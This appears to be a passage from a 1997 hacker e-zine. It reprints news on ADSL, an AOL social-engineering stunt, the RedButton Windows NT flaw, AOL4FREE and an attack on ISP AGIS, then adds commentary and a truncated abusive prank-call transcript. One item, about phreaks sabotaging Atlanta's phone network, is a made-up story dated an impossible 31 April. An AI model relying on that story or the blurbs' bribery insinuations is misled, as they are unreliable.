"ADSL is not rocket science," Waldhuter said. "It builds off the technology
of today's analog modems."
According to Waldhuter, ADSL leverages the same advances in modem technology,
and by using a larger window of the spectrum on the copper wires. He said:
"It uses 200 times the spectrum on the copper wire than we are currently
using. That is how we can get six to eight megabits over the copper to
individual homes."
NYNEX is working closely with US Robotics, the modem manufacturer, to design
a modem that will initially provide 56K service but that could be used for
ADSL service once it is launched.
"We just met with US Robotics, and they see a tremendous upside opportunity
in the market," Waldhuter said. "They are going to do some aggressive pricing
to bring down the cost so it will be affordable to consumers by the 1998 time
frame."
Cisco Systems recently entered the Digital Subscriber Loop market by
acquiring Telesend, a privately held company that developed a symmetrical
xDSL technology, called IDSL. Cisco claims that users can obtain 128Kbps
connections, double the speed of existing single B channel ISDN data
services and many times faster than 28.8Kbps or 56Kbps modems.
"ISDL can be deployed quite economically because many ISDN devices can
potentially support IDSL with a simple software change," said Andrew
Greenfield, director of Service Provider Infrastructure at Cisco Systems.
Greenfield added that the difference between ADSL and IDSL is that ADSL has a
different bandwidth in each direction. "One common configuration gives you
640 kilobits per second from the customer to the network and 6 megabits in
the reverse direction," he said. "Whereas IDSL is symmetric with 128 Kbps in
both directions."
Companies offering an alphabet soup of xDSL technologies are confident that
the variety of services will be compatible.
"The approach we're going to take is standardizing the backbone data network
off the circuit switch voice network to make sure that it is able to have a
wide variety of DSL technologies plug right into our backbone," Castleton
said. "That is the direction a number of the Ciscos and Bay Networks are
heading."
None of the companies provided clear pricing details.
Cisco's Greenfield offered only that consumers would start seeing something
analogous to business class and coach class service for the Internet.
"There will a consumer oriented bandwidth that would be competitively priced
to be affordable to consumers," said John Johnson, a NYNEX spokesman. "And a
business-level bandwidth at a price businesses expect to pay -- one that is
competitive with existing services."
How effective the xDSL technologies will be depends entirely on how widely
they will be available.
"Our ADSL roll-out plans are being finalized, but we will be concentrating on
metropolitan and suburban areas, and other areas of high demand," said
Johnson. "I can't be more specific at this time. But yes, it will be limited
by the weakest link in the chain, where ever that may be."
Before xDSL technologies lure ISPs off the exempted lines, the question of
costs and availability will have to be spelled out.
"It's fine to say these products are available, but our primary concerns are
whether its level of deployment will be close to ubiquity and what the
ultimate cost would be to upgrade," said AOL's Lesser. "We are also concerned
about what upgrades will be necessary from the consumer side because we serve
largely a residential rather than a business market place. If it's not widely
available to our customers, it's not that useful for us to invest in."
With other access technologies on the horizon, such as cable and improved
wireless connections, consumers can only wait to see which become the
standard.
©New York Times
_____________________________________________________________
Hacker Provokes Klan Site Shutdown
by David Lazarus
11:55am 22.Apr.97.PDT -- A hacker named "Joka" managed to get America Online
to briefly shut down a site run by the Texas branch of the Ku Klux Klan over
the weekend, forcing the service to act for security reasons after it had
declined to do so in response to widespread criticism that the site contains
offensive material.
"Somebody was password fishing," AOL spokeswoman Wendy Goldberg said Tuesday.
"They were using a made-up screen name similar to the one for the Klan. When
people register complaints, we pull the screen down."
Simple as that - and exactly as Joka had hoped.
In a newsletter called the AOL List that routinely slams the quality of AOL's
service, David Cassel wrote that he'd spoken with Joka, who explained how he
succeeded in attacking the Klan site by using "the hacker skill of social
engineering."
What Joka did was set up a screen name that closely resembled that of the
Realm of Texas of the KKK. "I went around asking people for their passwords,
hoping that they would report the wrong screen name," he was quoted as
saying.
It worked. Goldberg said a number of complaints were received from members
last Friday that the operator of the Klan site was going around asking for
people's passwords. AOL's security force promptly shut down the Klan site and
launched an investigation.
"We checked and saw it was a made-up screen name," Goldberg said. "When we
saw this, we put the Klan's screen back up." She added that the amount of
time the Klan site was down was not very long.
AOL has drawn considerable flak since Wired News first reported the ongoing
presence of the Klan site on its server - despite the service's crackdown on
other sites deemed offensive or pornographic.
The KKK Realm of Texas site discusses America being "duped by the lies of the
race mixers and mongrelizers," and declares the Klan's commitment to "the
preservation, protection, and advancement of the White race."
Goldberg said the site was reviewed months ago by AOL, and the service
decided to let it stay. "These are difficult judgment calls, and we're making
them on a case-by-case basis," she said. "What we look at is the content and
character of a site."
For his part, Joka figures his shadow Klan operator drew about 200 complaints
after attempting to shake down more than 3,000 AOL members. "Stupid people on
AOL always amaze me," he was quoted as saying.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
RedButton Lets Anyone Be Everyone
by Michael Stutz
2:57pm 22.Apr.97.PDT -- A serious security hole in Windows NT is the latest
in a recent series of published vulnerabilities in the Microsoft operating
system.
The "RedButton Bug," named for the first program to demonstrate the NT
vulnerability, allows an intruder to bypass the traditional logon procedures
and grants that user access to intimate system information on an NT server.
Normally, entry to an NT machine is obtained by logging on with a valid
username and password combination, or optionally using the guest account, if
enabled. The RedButton Bug exploits an alternate means of access on NT
machines - the anonymous account - which is normally used for
machine-to-machine communication on a network.
Once connected, this account gives users access to all resources available to
the group called "everyone," which is as it sounds, all of the users on the
system. These resources include file shares, of which the default group when
first created is "everyone." Some resources could even be written by the
intruder, allowing the implant of Trojan horses.
The bug was discovered by Andy Baron at Midwestern Commerce Inc., a firm that
specializes in NT security consulting and assessment. A working demo of the
flaw was recently published on NTsecurity.com, the Columbus, Ohio, firm's Web
site.
When run, RedButton demonstrates how the flaw allows users to log on to any
LAN or Internet workstation running Windows NT versions 3.5x or 4.0 for which
they have network access. Users don't have to complete the username or
password fields. Once on the server, a user sees sensitive information about
the host machine, including the name of the administrator account and various
entries in the Windows NT Registry, including a list of users.
The RedButton program runs only on NT machines. "Our goal wasn't to make it
available for all platforms," said MWC director of sales Andy Pozo.
Potentially, the bug can be exploited by any networked computer.
Microsoft officials were unavailable for comment Tuesday despite several
attempts to reach them.
For now, network administrators have no fix, other than disconnecting servers
from the network, a practice that's incongruous with the function of the
machines in the first place. And taking away the anonymous access isn't an
option, said Pozo. "Disabling anonymous access would hinder NT as a useable
networking platform," he said.
Partial fixes are available, including the EVERYONE2USER.EXE program,
developed by David LeBlanc at Internet Security Systems Inc., which changes
resources from the "everyone" group to one called "user group."
Internet-connected machines should have their NetBIOS services unbound from
their Internet interface.
"Microsoft may include a fix to this problem in time for Service Bug 3, but
it could be difficult - this bug affects the basic design of NT," Pozo said.
It would also require the patching of a number of kernel-level subroutines,
he said.
Pozo maintains that the latest breach in Microsoft's heavy-hitting OS does
not mean it's not viable. NT is only showing its youth, he said. "[NT]
doesn't have the 20 years [of security checking] that Unix has."
To hackers, NT's vulnerability stems not from the lack of security but from
the very existence of a security scheme. "NT has a security model, and Unix
doesn't," said Mudge, a hacker at the Boston-based collective L0pht
Communications.
"That's a good thing, but the problem is that so many software vendors tend
to bypass that model - including Microsoft itself," he said, referring to the
oft-alleged tendency of Microsoft to ignore its own security precautions.
And Mudge ought to know. He is the co-author of L0phtcrack, a new tool that
demonstrates Windows NT password insecurities, somewhat analogous to the
Crack utility in the Unix world.
Cracking NT passwords is an easier task than the Unix counterpart because the
NT encryption isn't as thorough. When encrypting passwords, NT makes no use
of a salt, a mathematical function that increases the possibilities for an
encrypted password. And NT only runs through one round of DES encryption for
each password, as opposed to the 24 rounds of its Unix equivalent, Mudge
said.
Thanks to this and some slick code writing, L0phtcrack is currently the
fastest password-cracking tool available for the NT platform.
"Our goal is to be able to brute force a 14-character NT password on a
Pentium Pro 200 in under 24 hours," said co-author and fellow L0pht hacker
Weld Pond.
But it's not the only one. The current issue of Phrack Magazine, one of the
premier security and technology e-journals published by the hacker culture,
demonstrates another program that cracks NT passwords.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
AOL4FREE Culprit Tells His Tale
by David Cassel
5:02am 22.Apr.97.PDT -- Nicholas Ryan, a college junior convicted for
authoring the original AOL4FREE program, will be leaving Yale University
this June to start a six-month home sentence, and two years of probation.
For 25 hours a week, he will be working at a special education program as a
form of community service. But on off-hours, Ryan will be working on an
encryption program for Windows 95, based on the Macintosh program that
stumped the Secret Service agents who confiscated his computer. "It would be
a mini-encrypted hard drive - every time you shut down the computer, all the
information would be totally encrypted."
Three weeks after his conviction, Ryan says he is ready to talk about his
hacker past, and to share his experience of creating a program in 1995 that
allowed hackers to use AOL without paying the hourly charge. Last week, Ryan
came forward with a 30-KB essay explaining his motives and experiences to
hacker sites. His confessions came the same week that the Department of
Energy put out a warning against the AOL4FREE "Trojan horse," a
file-destroying program that is masquerading as Ryan's original program.
"I was an outlaw, a spy," Ryan boasts, "and I loved cracking the puzzle of
AOL's system." During the days of US$2.95-an-hour pricing, AOL4FREE made
Ryan, aka Happy Hardcore, a hero in hacker chat rooms. "When I entered a
room, I'd immediately get dozens of messages asking about when my next
version would come out, who I knew, and many just thanking me." His essay
also includes anecdotes of hacking live chats and distributing AOL customer
data.
In a press release applauding his conviction, AOL conceded that hundreds used
the program to gain free access to the service. Ryan's is the first federal
felony conviction involving an online service, AOL claims. "AOL and the
prosecutors decided they wanted it to strike a blow against the hackers and
take me out as an example," Ryan said in an interview. "At one point they
were even claiming that the damages were US$1.5 million."
Ironically, Ryan had titled one section of the documentation for AOL4FREE
"Can I get caught?" He even supplied a prescient answer: "A better question
would be, 'Would they want to prosecute me if I'm caught?'" Ryan now claims
he'd been reassured by internal memos forwarded by hacker friends that AOL
would not go after him. "I assumed they were going after the AOL4FREE users.
Kind of a dumb assumption.... The Secret Service knocked on my door in
December."
Of the latest AOL4FREE decoy, Ryan says there's nothing new in naming
Trojan-horse programs after real ones. "I remember during 1995, way back
then, there was an AOL4FREE program that was actually a Trojan horse. So this
program may just be a couple of years old."
Mixed in with the harrowing stories of his exploits, Ryan's confessional
essay includes a disclaimer: "I stress that in no way did we EVER do anything
to cause permanent damage using the tools or information that we found." He
adds: "We could've taken down 500 file libraries. We could've massively
wreaked havoc on the service. But it wasn't what we were there for. It was a
puzzle of it, the challenge of it."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
AGIS Keeps Mum Over Attack, FBI Inquiry
by Michael Stutz
11:55am 22.Apr.97.PDT -- One of the country's largest Internet service
providers is tight-lipped after an attack on its networks was revealed to be
more serious than originally reported.
Apex Global Information Services (AGIS), considered one of the "big six"
backbone Internet service providers, confirmed Monday that it has been the
target of an all-out network attack and that the FBI is investigating the
incident. In addition, the company has notified the Computer Emergency
Response Team.
Although the company would not comment on the scope of the FBI investigation,
a spokesman said that no private information was compromised.
Observers believe the attack is spam-related because of the company's
belligerent attitude toward unsolicited bulk email. A quick scan of the
Usenet groups such as news.admin.net-abuse reveals the depth of discontent
with the service.
AGIS, home to some of the most infamous spam factories on the Net, such as
CyberPromotions, is considered to be the world's largest "rogue" site by
anti-spam activists such as Robert Braver.
Braver on Monday published Implementing Warnings for AGIS Netblocks, a
collection of CGI scripts that webmasters could insert in their sites so that
anyone from an AGIS network connecting to a page on the site would receive a
warning message instead of the page's actual contents. The warning informs
the user that, because AGIS provides bandwidth to spammers, some sites and
networks may restrict access from their machines to AGIS.
It is exactly that sort of blocking that was originally feared to have caused
the recent AGIS attack.
Users who traced the route from hosts originating on network giant ans.net to
destinations in AGIS territory over the weekend noticed that their trail
ended abruptly at AGIS' connection to the servers where MFS Communications
Company Inc. administers to MAE-East, the largest national network access
point. Forty-six ISPs, including all major US and some European firms,
connect to routers here to exchange data with other networks.
This cut-off fueled speculation among the sleuthing users that ans.net, tired
of AGIS' spam-positive practices, configured one of their core routers to
ignore all traffic to or from the AGIS address space. But this was not the
case, as many hosts on MAE-East suffered similar routing problems during the
same time span.
Instead, the outage was most likely a hardware problem on AGIS' side -
possibly related to the attack.
Just what hardware failed and how is something AGIS appears to be keeping in
its vest pocket for now. Even the company spokesman is in the dark. "My
client hasn't told me whether or not [their silence] is because of the FBI
investigation, or what," said the spokesman, Steven Wright-Mark.
Nonetheless, it is likely that the company will be forced to change its
spam-positive ways; Wright-Mark confirmed that AGIS is expected to release a
statement sometime this week updating its position toward the highly
unpopular junk email. If this change materializes, it will be a welcome move
from a major ISP that, for a time, returned complaints and other email
reports of Net abuse back to the sender, unread.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
HLO brings chaos to CERT conference
by K.F. Fox
13:00pm 31.Apr.97.EST (HNS) -- At the CERT conference on communications
security held today in Atlanta, GA, an apparent reign of terror has begun at
the hands of a group of militant phone phreaks known only as the HAVOC
Liberation Organization, or HLO.
Throughout the Atlanta metropolitan area the telephone network has collapsed,
mainly due to malicious vandalism of telephone access boxes located on nearly
every city block of the region. Moments before this terror spree began, an
anonymous tip was called in to the Atlanta police, stating what could best be
described as "the end of telecommunications tyranny" as the unidentified
caller termed it. The caller, in the name of the HLO, claimed responsiblity
for the terror, and stated that further destruction would be necessary if
the HLO's demands for cheaper and more widely available phone service were
not met.
Rufus Jones, a spokesman for Southern Bell, Atlanta's largest local phone
service provider, had this to say: "We stand firmly behind our pricing
policies, and believe that this attack is mainly aimed at long distance
carriers such as AT&T and Sprint." Ironically, the majority if not all of
the property damaged in this reign of terror is owned and operated by
Southern Bell. When asked if his company was indeed being singled out in the
rampage, Jones refused comment.
What is clear to investigators is that the amount of damage in this terror is
significant. Preliminary reports estimate the cost at between $1.2 and $2.8
million. Those figures do not include the loss in business revenue
anticipated as a result of this service outage.
Atlanta Police are now following several leads in their investigation,
including information provided by an informant working for the FBI.
According to Tsutmu Shimomura, chief investigator for the APD, the informant,
known only as "SINISTER", has been spying on the HLO through a super-secret
underground hacker chat network on the internet, known as IRC.
Through this network the HLO has discussed subjects ranging from prank phone
calls to destroying entire areacodes with a device known as a blotto box. It
is believed that the group's membership may number in the hundreds.
"I don't know who these guys are, but they're real mean, and I'm going to
write another autobiography when I catch them." said Shimomura.
HNS will continue to report on this story as more information becomes
available.
©1997 HAVOC News Service
_____________________________________________________________
[3rd Major NT Security Flaw]---------------------------------------------
Following Microsoft's Internet Explorer Web broswer exploitation, another
major flaw was discovered in another Microsoft product making it the 3rd
major 'hack'. 2 security technologists wrote a code to exploit the major
security flaw in Microsoft's NT network operating system which allowed the
remote user to decrypt critical files including the registry of user
passwords. Somehow I doubt Microsoft 'accidently' overlooked such a dangerous
hole in one of their most advanced software productions. As of no surprise,
Mike Nash (director of marketing for NT Server), has made no remark at all to
developing a possible 'patch'. A child could obtain these passwords by
sending a Trojan Horse to a user on the network. With these flaws it is
easily predicted that more sysadmins will turn to Unix for security.
"we're still seeing bugs coming out of 20-year-old Unix, and NT is a
baby in comparison." -- Goggans
based on an article first published via on the web at www.eet.com only a few
days ago by Larry Lange.
[Marlyand Begins 10 Digit Dialing]-----------------------------------------
As of May 1st 1997 ( the release date of this issue) Marlyanders will
have to dial 10 digits for local calls. This is the same date as Bell
Atlantic adds 2 new area codes, 443 and 240 (not sure about the second area
code) to Maryland's two current area codes, 410 and 301. This is the second
time in the past ten years that Bell Atlantic has added area codes to
Maryland, however, when they added 410 a few years back, we still kept the
standard 7 digit dialing, oh well, that's progress for you.
[The Bell Atlantic/ Nynex Merger Clears a Major Hurdle]----------------------
The coming Bell Atlantic/ Nynex merger, which was started off almost
a year ago, has cleares the Justice Department. Suprisingly, after first
passing each state's PTC ( Public Telephone Commission ) that the merger will
affect, it was declared that the merger does not violate antitrust measures
that will keep the monopoly and hurt the new comers to the local phone
market. ( Yea right, i think this agreement came after some money had been
slipped under the table.... ) Anyway, now the merger only need the blessing
of the FCC, which shouldn't be hard to get. Stay tuned for more details in
this 23 billion dollar deal.
[Inferno OS Beta Test is Released]-------------------------------------------
Lucent Technologies, formerly Bell Labs, but spun off into a new
private company, has released Inferno OS, a new operating system which looks
rather cool. It is mainly targeted to the programming and IS managers of the
computer world, but Lucent is opening its view, and seeing that Inferno would
make a viable internet host, and game development machine. It sounds like it
is mainly based for UNIX machines, but there are versions of this for almost
every platform. ( However, as of this writting, Slackware linux is
unsupported while Red Hat is supported.) It is now looking like a
multipurpose OS like JavaOS, which can be ported to many platforms and all
apps will run and look the same. But, i think searching stuff on the internet
from your toaster is still a few years off. You can find out more information
and even download a copy of Inferno ( 20 mbs!) from:
http://www.lucent.com/inferno/
_____________________________________________________________
[ Phone Calls ]
[1] [ NOTE: First, let it be known, that if you didn't read the news, Bell
Atlantic customers in the Maryland area, will have to use 10 digit dialing
beginning May first. So get ready for this, of course, i have been dialing
all ten digits for local calls, to get practice so my calls will go thru ]
[ Crappy James Earl Jones Bell Atlantic Greeting]
Operator> Thank you for using Bell Atantic. How may i help you?
Me> I want to to fix your phone system.
Operator> Excuse me?
Me> Your phone system, it keeps giving me a 'The number you have dialed is
not available, please hang up and try again'
Operator> Are you sure you a dialing the right number?
Me> Fuck yes I am, Im adding the area code in, so i remember when to do it
when May 1st comes around. With out the area code, it works fine, fix your
damn system.
Operator> Sir, please try to calm down.....
Me> Fuck that! I am calm!
Operator> Sir, Please stop the abusive language....
Me> You want abusive language? Ill give you abusive language!
Operator> Sir, I can't explain why your calls arent going through, maybe you
are dialing the wrong number.
Me> Do I sound like an idiot to you? Do I? Fuck you, let me speak with your
supervisor.
Operator> Are you sure you want to speak with my supervisor?
Me> Hell Yes I do
Operator> Ok sir, let me get them on the line for you....
[ Elevator Music ]
Supervisor> Sir?
Me> Yea, fix your damn phone system.
Supervisor> What?
Me> Damnit, I SAID FIX YOUR DAMN PHONE SYSTEM SO THAT I CAN USE THE AREA CODE
TO DIAL A LOCAL CALL SO I WILL BE IN GOOD SHAPE WHEN MAY FIRST IS HERE!
Supervisor> Sir, are you sure your calls are local? They may be long dis
